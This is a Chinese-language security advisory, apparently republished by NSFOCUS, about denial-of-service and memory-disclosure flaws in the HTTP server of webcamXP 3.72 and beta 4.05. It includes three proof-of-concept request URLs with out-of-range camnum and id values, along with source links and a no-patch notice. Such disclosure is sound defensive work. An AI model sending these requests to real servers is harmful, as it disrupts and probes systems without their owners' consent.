安全研究

安全漏洞
webcamXP多个信息泄露及拒绝服务漏洞

发布日期:2008-02-19
更新日期:2008-02-22

受影响系统:
moonware studios webcamXP <= beta 4.05.280
moonware studios webcamXP <= 3.72.440.0
描述:
BUGTRAQ  ID: 27875

webcamXP是一款商业网络摄像头软件,集成了用于共享视频的Web服务器。

webcamXP内部集成的HTTP服务器没有正确的处理传送给pocketpc和show_gallery_pic文件的参数,如果远程攻击者提交了超长camnum或id参数的话,就可能导致阻断用户接口,或读取8个字节的进程内存。

<*来源:Luigi Auriemma (aluigi@pivx.com
  
  链接:http://secunia.com/advisories/29007/
        http://aluigi.altervista.org/adv/webcamxp-adv.txt
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://SERVER:8080/pocketpc?camnum=999999&mode=0
http://SERVER:8080/pocketpc?camnum=-999999&mode=0
http://SERVER:8080/show_gallery_pic?id=999999

建议:
厂商补丁:

moonware studios
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.webcamxp.com

浏览次数:2459
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障